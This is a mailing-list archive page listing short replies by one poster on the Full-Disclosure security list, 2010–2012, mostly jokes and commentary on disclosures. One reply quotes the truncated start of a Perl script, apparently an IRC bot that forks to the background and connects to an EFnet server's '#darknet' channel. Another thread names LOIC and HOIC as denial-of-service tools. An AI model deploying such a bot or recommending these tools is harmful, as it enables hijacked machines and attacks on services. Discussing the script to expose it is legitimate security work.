Re: [Full-disclosure] some distros for Raspberry Pi have sshd enabled and default logins.

2012-08-04 Thread rancor
ent is they should prompt the user to change the password, not > provide an insecure image > With the expectations that users will secure it themselves. It maybe > obvious to us, but with a good deal > Of the audience being inexperienced users it should be part of the install. > &

Re: [Full-disclosure] some distros for Raspberry Pi have sshd enabled and default logins.

2012-08-04 Thread rancor
No shit Sherlock! On Aug 4, 2012 3:38 AM, "larry Cashdollar" wrote: > Vapid Labs > Larry W. Cashdollar > 8/2/2012 > > > Since a some RaspberryPi users maybe unaware of the security implications of > sshd I thought I should just make a note of some issues. > > RaspberryPi image Occidentalis v0.1

Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 11: ] How much time is appropriate for fixing

2012-07-10 Thread rancor
<3 On Jul 10, 2012 9:17 PM, "Григорий Братислава" wrote: > I reply to you is back "on-list." Information is for meant to be free. > And so you know, is no, your English is improper: > > You say: "People do not need seeing your arguments" > > Is correct: "People do not need to READ your comments"

Re: [Full-disclosure] Warning is about APT

2012-06-25 Thread rancor
You know that was not for real, just someone making fun of one of the characters on the list. Don't waste your time On Jun 25, 2012 9:09 PM, "c-APT-ure" wrote: > Hi mustntlive > > could you maybe try a better translation service so that it's easier to > understand the meaning of your messages? (

Re: [Full-disclosure] How to access your favorite sites in the event of a DNS takedown ?

2012-06-25 Thread rancor
I like this thread =) kind of the surf'aholic disaster plan for idiots and it's amusing in its own sad way On Jun 25, 2012 9:52 PM, wrote: > > Do you know? Even in DNS take down you can youcan access your favourite > > sites. > > > > People may think that in DNS shoutdown they can lost access to

Re: [Full-disclosure] FSA2012-1 and FSA2012-2: Chocolate easter egss vulnerable to egg white injection and usable as trojan horses.

2012-04-07 Thread rancor
Nice catch! "Glad påsk" as we say in Sweden Den 7 apr 2012 16:23 skrev "klondike" : > Given to their nature chocolate easter eggs present a few > vulnerabilities that can be exploited by a malicious attacker to gain > complete control of a person's hate. > > FSA2012-1: > 1. Summary > Impact: high

Re: [Full-disclosure] is my ISP lying or stupid?

2012-03-16 Thread rancor
It makes no sense unless it was a layer 3 switch. The firewalls or routers should be the first network hardware to go on their knees before a switch but... who knows what hardware they are running anyway Den 16 mar 2012 17:31 skrev "Jerry dePriest" : > ** > They had a DoS of mail, www and shell.

Re: [Full-disclosure] Best DoS Tool

2012-02-28 Thread rancor
I just thought we where name dropping stuff =( 2012/2/28 Julius Kivimäki : > I hope you guys are not seriously suggesting these. > > -- Edelleenlähetetty viesti -- > Lähettäjä: rancor > Päiväys: 28. helmikuuta 2012 13.28 > Aihe: Re: [Full-disclos

Re: [Full-disclosure] Best DoS Tool

2012-02-28 Thread rancor
LOIC is old... HOIC is their new toy 2012/2/27 Ramo : > What about LOIC? An unknown number of Anonymous can't be wrong! > > Sent from Android. Because Android is a boss. > > On Feb 27, 2012 9:17 PM, "Manuel Moreno" wrote: >> >> Hi List!! >> >> I made some research about DoS Tools for my regulars

Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-27 Thread rancor
#!/usr/bin/perl$chan="#darknet";$nick="moron";$server="efnet.vuurwerk.nl";$SIG{TERM}={};exit if fork;use IO::Socket;$sock = IO::Socket::INET->new($server.":6667")||exit;print $sock "USER moron +i moron :moronv2\nNICK moron\n";$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+) /){$mode=$1;last if $mode=="001";if($

Re: [Full-disclosure] China - the land of open proxies

2011-09-01 Thread rancor
// rancor Den 2 sep 2011 00:48 skrev "Ferenc Kovacs" : > not asked, but ~suggested: > "This is offered as data you may be able to use for forensic purposes > or router block lists." > > On Fri, Sep 2, 2011 at 12:42 AM, Thor (Hammer of God) > wrote: >> No agend

Re: [Full-disclosure] China - the land of open proxies

2011-09-01 Thread rancor
2011/9/1 Mr. Hinky Dink > > In July, hundreds of Chinese proxies on port 8909 started showing up > every day on public proxy lists. In August the daily numbers were in > the thousands. > > Here is the list I collected during that period. There are >135K > proxies in this file (text, tab delimit

Re: [Full-disclosure] Announcement posts and the charter (was Re: INSECT Pro 2.5.1 released)

2011-04-12 Thread rancor
What to do about it? It's not moderated? Just ignore stuff and use the often used key called delete. Simple as that =) // rancor Den 12 apr 2011 21.16 skrev "Steve Pinkham" : > On 04/12/2011 09:04 AM, phil wrote: >> Just keep that simple, the post hit th

Re: [Full-disclosure] RHEL Linux Kernel Exploit

2010-12-15 Thread rancor
-g "musnt live" is a parody of "must live"... humor this =) // rancor 2010/12/15 Greg Whynott > funny... > 1. you were root when you ran the code! epic elite. > 2. he said "red hat" NOT redhat based. Redhat has no control over what > others do

Re: [Full-disclosure] XSS in a lot of products

2010-09-30 Thread rancor
Thou shalt not visit sites upon request 2010/9/29 pepelotas > I've discover a lot of XSS in multiple products, check my webpage: > http://hacking-avanzado.blogspot.com/ > > Eduardo Abril > Security Researcher > > ___ > Full-Disclosure - We believe in i